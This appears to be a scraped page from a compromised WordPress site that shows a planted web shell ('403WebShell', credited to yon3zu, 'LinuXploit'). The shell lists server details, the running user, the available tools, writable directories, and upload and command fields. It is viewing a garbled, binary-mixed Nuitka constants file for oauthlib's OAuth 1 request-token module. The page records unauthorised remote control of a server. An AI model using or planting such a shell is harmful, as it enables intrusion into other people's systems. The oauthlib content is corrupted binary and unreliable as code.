Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /nuitka/eggshell.build/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /nuitka/eggshell.build/module.oauthlib.oauth1.rfc5849.endpoints.request_token.const
���oauth_token�.���token_generator�.���oauth_token_secret�.���oauth_callback_confirmed�.���true�.���request_validator�.���save_request_token�.��
�	urlencode�.��	�items�.�����Create and save a new request token.

        :param request: OAuthlib request.
        :type request: oauthlib.common.Request
        :param credentials: A dict of extra token credentials.
        :returns: The token as an urlencoded string.
        �.��7}��Content-Type��!application/x-www-form-urlencoded�s.���_create_request�.��"�validate_request_token_request�.��*�&too many values to unpack (expected 2)�.���create_request_token�.�K�.��	}�NM���.��
�errors�.���OAuth1Error�.���
urlencoded�.���status_code�.��XCreate a request token response, with a new request token if valid.

        :param uri: The full URI of the token request.
        :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
        :param body: The request body as a string.
        :param headers: The request headers as a dict.
        :param credentials: A list of extra credentials to include in the token.
        :returns: A tuple of 3 elements.
                  1. A dict of headers to set on the response.
                  2. The response body as a string.
                  3. The response status code as an integer.

        An example of a valid request::

            >>> from your_validator import your_validator
            >>> from oauthlib.oauth1 import RequestTokenEndpoint
            >>> endpoint = RequestTokenEndpoint(your_validator)
            >>> h, b, s = endpoint.create_request_token_response(
            ...     'https://your.provider/request_token?foo=bar',
            ...     headers={
            ...         'Authorization': 'OAuth realm=movies user, oauth_....'
            ...     },
            ...     credentials={
            ...         'my_specific': 'argument',
            ...     })
            >>> h
            {'Content-Type': 'application/x-www-form-urlencoded'}
            >>> b
            'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_callback_confirmed=true&my_specific=argument'
            >>> s
            200

        An response to invalid request would have a different body and status::

            >>> b
            'error=invalid_request&description=missing+callback+uri'
            >>> s
            400

        The same goes for an an unauthorized request:

            >>> b
            ''
            >>> s
            401
        �.���_check_transport_security�.���_check_mandatory_parameters�.��	�realm�.��	�split�.��� ���.��
�realms�.���get_default_realms�.���
client_key�.���check_realms�.���InvalidRequestError�.��%�!Invalid realm %s. Allowed are %r.�.���description���.���redirect_uri�.���Missing callback URI.���.�� �validate_timestamp_and_nonce�.��
�	timestamp�.��	�nonce�.���resource_owner_key�.���
request_token���.���validate_client_key�.���dummy_client�.���validate_requested_realms�.���validate_redirect_uri�.��O�KRedirect URI must either be provided or set to a default during validation.�.���_check_signature�.���
validator_log�.��
�client�.���callback�.��
�	signature�.���log�.���info�.��,�&[Failure] request verification failed.���.���Valid client: %s.�.���Valid realm: %s.�.���Valid callback: %s.�.���Valid signature: %s.�.��QXJValidate a request token request.

        :param request: OAuthlib request.
        :type request: oauthlib.common.Request
        :raises: OAuth1Error if the request is invalid.
        :returns: A tuple of 2 elements.
                  1. The validation result (True or False).
                  2. The request object.
        �.��]XV
oauthlib.oauth1.rfc5849.endpoints.request_token
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This module is an implementation of the request token provider logic of
OAuth 1.0 RFC 5849. It validates the correctness of request token requests,
creates and persists tokens as well as create the proper response to be
returned to the client.
�.���__doc__�.��U�Q/usr/lib/python3/dist-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py�.���__file__�.���__spec__�.��
�origin�.���has_location�.���
__cached__�.���absolute_import�.���unicode_literals�.���logging�.�K.���oauthlib.common�.��h��.����.��h��.�K.���base�.���BaseEndpoint���.�K.�hR.��
�	getLogger�.��5�/oauthlib.oauth1.rfc5849.endpoints.request_token���.��
�	metaclass�.���__prepare__�.���RequestTokenEndpoint�.���__getitem__�.��2�.%s.__prepare__() must return a mapping, not %s�.���__name__�.���<metaclass>�.��3�/oauthlib.oauth1.rfc5849.endpoints.request_token�.���
__module__�.���X�An endpoint responsible for providing OAuth 1 request tokens.

    Typical use is to instantiate with a request validator and invoke the
    ``create_request_token_response`` from a view function. The tuple returned
    has all information necessary (body, status, headers) to quickly form
    and return a proper response. See :doc:`/oauth1/validator` for details on which
    validator methods to implement for this endpoint.
    �.���__qualname__�.��-�)RequestTokenEndpoint.create_request_token�.��
(�GET�NNNt�.��!�create_request_token_response�.��6�2RequestTokenEndpoint.create_request_token_response�.��7�3RequestTokenEndpoint.validate_request_token_request�.���__orig_bases__�.��<�8<module oauthlib.oauth1.rfc5849.endpoints.request_token>�.���	__class__���.��+(�self��request��credentials��token�t�.��`(hl�uri��http_method��body��headers�hn�resp_headers�hm�valid��processed_request�ho�e�t�.��L(hlhm�valid_client��valid_realm��valid_redirect��valid_signature��v�t�.

Youez - 2016 - github.com/yon3zu
LinuXploit